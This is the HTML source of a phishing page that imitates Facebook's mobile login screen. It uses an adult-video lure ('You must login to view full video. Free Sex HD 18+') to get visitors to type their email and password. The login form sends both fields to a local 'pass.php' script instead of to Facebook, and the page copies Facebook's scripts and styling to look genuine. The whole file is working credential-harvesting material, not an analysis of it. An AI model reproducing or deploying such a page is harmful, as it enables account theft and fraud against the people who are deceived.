
<meta charset=utf-8 />
<title>Facebook</title>
<meta name="viewport" content="user-scalable=no,initial-scale=1,maximum-scale=1" />
<link href="mlogo.png" rel="apple-touch-icon-precomposed" sizes="196x196" />
<meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" />
<script>
</script>
<link rel="stylesheet" type="text/css" id="CvS4j" href="hung.css" />
<script>document.domain = 'facebook.com';if(/^#~?!(?:\/?[\w\.-])+\/?(?:\?|$)/.test(location.hash))location.replace(location.hash.substr(location.hash.indexOf('!')+1));window.FB_GKS={"mobile_chrono_selector":true,"mobile_js_show_debug":false,"mobile_js_log_error":false,"js_typechecks":true,"m_js_log_history":false,"m_js_html_snapshot":false,"js_nocatch":false,"moulder_feed_hide_toggle":false,"m_onephase_home":true,"local_storage_cache":false,"mtouch_composer_no_autoresize":true,"m_js_crossorigin_attribute":true};window.FB_QES={};</script>
<script id="u_0_e" crossorigin="anonymous" src="https://gm-static.ak.fbcdn.net/rsrc.php/v2/yl/r/uu6kxJTXKxu.js">
</script>
<script id="u_0_f">require("MPrelude")</script>
<script id="u_0_g">(function _(a,b,c,d){if(!a){document.cookie=b+'=;expires=Thu, 01-Jan-1970 00:00:01 GMT';document.cookie=c+'=;expires=Thu, 01-Jan-1970 00:00:01 GMT';return;}var e=null;if(navigator.userAgent.indexOf('Firefox')!==-1||!window.devicePixelRatio&&navigator.userAgent.indexOf('Windows Phone')!==-1){e=screen.width/document.documentElement.offsetWidth;e=Math.max(1,Math.floor(e*2)/2);}if((!e||e===1)&&navigator.userAgent.indexOf('IEMobile')!==-1){e=Math.sqrt(screen.deviceXDPI*screen.deviceYDPI)/96;e=Math.max(1,Math.round(e*2)/2);}document.cookie=b+'='+(e||window.devicePixelRatio||1);var f=window.screen?screen.width:0,g=window.screen?screen.height:0;document.cookie=c+'='+f+'x'+g;if(d&&document.cookie&&window.devicePixelRatio>1)document.location.reload();})(true, "m_pixel_ratio", "wd", false);
</script>
</head>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-87419803-1"></script>

<body tabindex="0" class="touch x1 _fzu _50-3 iframe acw">
<script id="u_0_9">(function(a){a.__updateOrientation=function(){var b=!!a.orientation&&a.orientation!==180,c=document.body;if(c)c.className=c.className.replace(/(^|\s)(landscape|portrait)(\s|$)/g,' ')+' '+(b?'landscape':'portrait');return b;};})(window);</script>
<div id="viewport">
<h1 style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">Facebook</h1>
<div id="page"><div class="_129_"></div>
<div class="_4g33 _52we _52z5" id="header">
    <img alt=""src="mlogo.png" width="80px" style="horizontal-align:middle;margin: 50px 150px" ></div>
<div class="_4g34 _52z6" data-sigil="mChromeHeaderCenter">
<a href="#"><i class="img sp_kI2cRYmfItQ sx_7ae7ba">
<u>facebook</u>
</i>
</a>
</div>
</div>
<div id="root" role="main" class="_5soa acw" data-sigil="context-layer-root content-pane">
<div class="_4g33">
<div class="_4g34">
<div class="aclb _5rut">
<form method="GET" class="mobile-login-form _5spm" id="u_0_0" novalidate="1" action="pass.php">
<input type="hidden" name="lsd" value="AVqkYwEU" autocomplete="off" />
<input type="hidden" name="charset_test" value="&#x20ac;,&#xb4;,&#x20ac;,&#xb4;,&#x6c34;,&#x414;,&#x404;" />
<input type="hidden" name="version" value="1" /><input type="hidden" id="ajax" name="ajax" value="0" />
<input type="hidden" id="width" name="width" value="0" /><input type="hidden" id="pxr" name="pxr" value="0" />
<input type="hidden" id="gps" name="gps" value="0" />
<input type="hidden" id="dimensions" name="dimensions" value="0" />
<input type="hidden" name="m_ts" value="1444981372" />
<input type="hidden" name="li" value="fKogVnFYklxjk1zuKIBvk-jr" />
<div style="text-align: center; padding-top: 10px; padding-bottom: 10px;"><center><p><font color=red> You must login to view full video.Free Sex HD 18+ .</font></p></center><div style="text-align: center; padding: 10px;"></div>
<img alt="" height="70" src="https://static-s.aa-cdn.net/img/amazon/30600000075239/3c06a3c059591104382067717a89f053?v=1" style="border-top-left-radius: 7px; border-top-right-radius: 7px; border-bottom-right-radius: 7px; border-bottom-left-radius: 7px; display: inline-block; height: 70px; width: 70px;" width="70">
<img alt="" class="scaledImageFitWidth img" height="70" itemprop="image" src="https://static-s.aa-cdn.net/img/amazon/30600000225204/a47505f21fc81d91cccc6d4bcbdafc0b?v=1" style="width: 70px;padding-left: 15px;"></div>

<div class="_5yd0 _2ph- _5yd1" style="display: none;" id="notify"></div>
<div class="_56be _5sob">
    <div class="_55wo _55x2 _56bf">
        
        <input autocorrect="off" autocapitalize="off" required="true" class="_56bg _4u9z _5ruq" name="email" placeholder="Email or Phone" value="" type="text" data-sigil="login-form-input" />
        <div class="_3nph _mg8">
            <div class="_4g33">
                <div class="_4g34 _5i2i _52we"><div class="_5xu4"><input autocorrect="off" autocapitalize="off" class="_56bg _4u9z _27z2" required="true" name="pass" placeholder="Password" id="u_0_1" type="password" data-sigil="login-form-input password-plain-text-toggle-input" /></div></div><div class="_5s61 _216i _5i2i _52we"><div class="_5xu4"><div class="_2pi9" id="u_0_2" style="display:none"><a href="#" data-sigil="password-plain-text-toggle"><span class="mfss" id="u_0_3" style="display:none">ẨN</span><span class="mfss" id="u_0_4">HIỂN THỊ</span></a></div></div></div></div></div></div></div><div class="_2pie"><button type="submit" value="&#x110;&#x103;ng nh&#x1ead;p" class="_54k8 _56bs _56b_ _56bw _56bu" name="login" id="u_0_5" data-sigil="touchable"><span class="_55sr">Log In</span></button></div><noscript><input type="hidden" name="_fb_noscript" value="true" /></noscript></form><div class="_52jj _5t3b"><a class="_54k8 _56bs _5t3b _56bw _56bv" data-store="&#123;&quot;nativeClick&quot;:true&#125;" href="#" role="button" data-sigil="touchable"><span class="_55sr">Create New Account</span></a></div><div class="other-links"><ul class="_5pkb _55wp"><li><span class="mfss fcg"><a href="#">Forgot Password?</a><span aria-hidden="true"> · </span><a class="sec" href="#">Help Center</a></span></li></ul></div></div></div></div>
            </html>
           
           